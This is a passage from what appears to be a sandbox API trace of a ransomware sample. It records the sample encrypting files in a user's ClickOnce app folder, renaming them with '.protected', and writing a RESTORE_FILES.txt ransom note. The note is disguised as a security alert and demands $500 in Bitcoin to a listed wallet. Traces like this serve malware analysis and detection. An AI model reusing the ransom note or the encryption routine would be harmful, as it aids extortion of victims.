lpString2="System Volume Information") returned -1 [0078.154] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest") returned 170 [0078.154] StrStrIW (lpFirst="clickonce_bootstrap.exe.manifest", lpSrch=".protected") returned 0x0 [0078.154] lstrcmpW (lpString1="clickonce_bootstrap.exe.manifest", lpString2="RESTORE_FILES.txt") returned -1 [0078.154] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.154] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.154] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.154] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest") returned 170 [0078.154] StrStrW (lpFirst="clickonce_bootstrap.exe.manifest", lpSrch=".txt") returned 0x0 [0078.154] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest") returned 170 [0078.154] StrStrW (lpFirst="clickonce_bootstrap.exe.manifest", lpSrch=".rar") returned 0x0 [0078.154] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest") returned 170 [0078.154] StrStrW (lpFirst="clickonce_bootstrap.exe.manifest", lpSrch=".zip") returned 0x0 [0078.154] ReadFile (in: hFile=0x158, lpBuffer=0x49f458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.161] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.161] WriteFile (in: hFile=0x158, lpBuffer=0x49f458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.161] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.161] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.161] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.161] CloseHandle (hObject=0x158) returned 1 [0078.161] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest.protected") returned 180 [0078.161] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest.protected")) returned 1 [0078.162] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.162] lstrcmpiW (lpString1="clickonce_bootstrap_unsigned.cdf-ms", lpString2="Windows") returned -1 [0078.162] lstrcmpiW (lpString1="clickonce_bootstrap_unsigned.cdf-ms", lpString2="Program Files") returned -1 [0078.162] lstrcmpiW (lpString1="clickonce_bootstrap_unsigned.cdf-ms", lpString2="Program Files (x86)") returned -1 [0078.162] lstrcmpiW (lpString1="clickonce_bootstrap_unsigned.cdf-ms", lpString2="$Recycle.bin") returned 1 [0078.162] lstrcmpiW (lpString1="clickonce_bootstrap_unsigned.cdf-ms", lpString2="System Volume Information") returned -1 [0078.162] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms") returned 173 [0078.162] StrStrIW (lpFirst="clickonce_bootstrap_unsigned.cdf-ms", lpSrch=".protected") returned 0x0 [0078.162] lstrcmpW (lpString1="clickonce_bootstrap_unsigned.cdf-ms", lpString2="RESTORE_FILES.txt") returned -1 [0078.162] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.162] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.163] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms") returned 173 [0078.163] StrStrW (lpFirst="clickonce_bootstrap_unsigned.cdf-ms", lpSrch=".txt") returned 0x0 [0078.163] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms") returned 173 [0078.163] StrStrW (lpFirst="clickonce_bootstrap_unsigned.cdf-ms", lpSrch=".rar") returned 0x0 [0078.163] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms") returned 173 [0078.163] StrStrW (lpFirst="clickonce_bootstrap_unsigned.cdf-ms", lpSrch=".zip") returned 0x0 [0078.163] ReadFile (in: hFile=0x158, lpBuffer=0x49f458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesRead=0x295e2d4*=0xee0, lpOverlapped=0x0) returned 1 [0078.164] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff120, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.164] WriteFile (in: hFile=0x158, lpBuffer=0x49f458*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesWritten=0x295e2d4*=0xee0, lpOverlapped=0x0) returned 1 [0078.165] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.165] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.165] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.165] CloseHandle (hObject=0x158) returned 1 [0078.165] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms.protected") returned 183 [0078.165] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.cdf-ms.protected")) returned 1 [0078.166] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.166] lstrcmpiW (lpString1="clickonce_bootstrap_unsigned.manifest", lpString2="Windows") returned -1 [0078.166] lstrcmpiW (lpString1="clickonce_bootstrap_unsigned.manifest", lpString2="Program Files") returned -1 [0078.166] lstrcmpiW (lpString1="clickonce_bootstrap_unsigned.manifest", lpString2="Program Files (x86)") returned -1 [0078.166] lstrcmpiW (lpString1="clickonce_bootstrap_unsigned.manifest", lpString2="$Recycle.bin") returned 1 [0078.166] lstrcmpiW (lpString1="clickonce_bootstrap_unsigned.manifest", lpString2="System Volume Information") returned -1 [0078.166] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest") returned 175 [0078.166] StrStrIW (lpFirst="clickonce_bootstrap_unsigned.manifest", lpSrch=".protected") returned 0x0 [0078.166] lstrcmpW (lpString1="clickonce_bootstrap_unsigned.manifest", lpString2="RESTORE_FILES.txt") returned -1 [0078.166] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.166] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.167] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest") returned 175 [0078.167] StrStrW (lpFirst="clickonce_bootstrap_unsigned.manifest", lpSrch=".txt") returned 0x0 [0078.167] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest") returned 175 [0078.167] StrStrW (lpFirst="clickonce_bootstrap_unsigned.manifest", lpSrch=".rar") returned 0x0 [0078.167] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest") returned 175 [0078.167] StrStrW (lpFirst="clickonce_bootstrap_unsigned.manifest", lpSrch=".zip") returned 0x0 [0078.167] ReadFile (in: hFile=0x158, lpBuffer=0x49f458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesRead=0x295e2d4*=0x560, lpOverlapped=0x0) returned 1 [0078.168] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffaa0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.168] WriteFile (in: hFile=0x158, lpBuffer=0x49f458*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesWritten=0x295e2d4*=0x560, lpOverlapped=0x0) returned 1 [0078.168] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.168] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.168] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.169] CloseHandle (hObject=0x158) returned 1 [0078.169] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest.protected") returned 185 [0078.169] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest.protected")) returned 1 [0078.169] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.169] lstrcmpiW (lpString1="GoogleUpdateSetup.exe", lpString2="Windows") returned -1 [0078.169] lstrcmpiW (lpString1="GoogleUpdateSetup.exe", lpString2="Program Files") returned -1 [0078.169] lstrcmpiW (lpString1="GoogleUpdateSetup.exe", lpString2="Program Files (x86)") returned -1 [0078.169] lstrcmpiW (lpString1="GoogleUpdateSetup.exe", lpString2="$Recycle.bin") returned 1 [0078.170] lstrcmpiW (lpString1="GoogleUpdateSetup.exe", lpString2="System Volume Information") returned -1 [0078.170] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe") returned 159 [0078.170] StrStrIW (lpFirst="GoogleUpdateSetup.exe", lpSrch=".protected") returned 0x0 [0078.170] lstrcmpW (lpString1="GoogleUpdateSetup.exe", lpString2="RESTORE_FILES.txt") returned -1 [0078.170] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.170] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.170] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\googleupdatesetup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.170] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe") returned 159 [0078.170] StrStrW (lpFirst="GoogleUpdateSetup.exe", lpSrch=".txt") returned 0x0 [0078.170] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe") returned 159 [0078.170] StrStrW (lpFirst="GoogleUpdateSetup.exe", lpSrch=".rar") returned 0x0 [0078.170] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe") returned 159 [0078.170] StrStrW (lpFirst="GoogleUpdateSetup.exe", lpSrch=".zip") returned 0x0 [0078.170] ReadFile (in: hFile=0x158, lpBuffer=0x49f458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.170] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.170] WriteFile (in: hFile=0x158, lpBuffer=0x49f458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x49f458*, lpNumberOfBytesWritten=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0078.171] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.171] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.171] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.171] CloseHandle (hObject=0x158) returned 1 [0078.171] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe.protected") returned 169 [0078.171] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\googleupdatesetup.exe"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\googleupdatesetup.exe.protected")) returned 1 [0078.172] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0078.172] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0078.172] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\RESTORE_FILES.txt") returned 155 [0078.172] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.172] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.172] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0078.173] lstrlenA 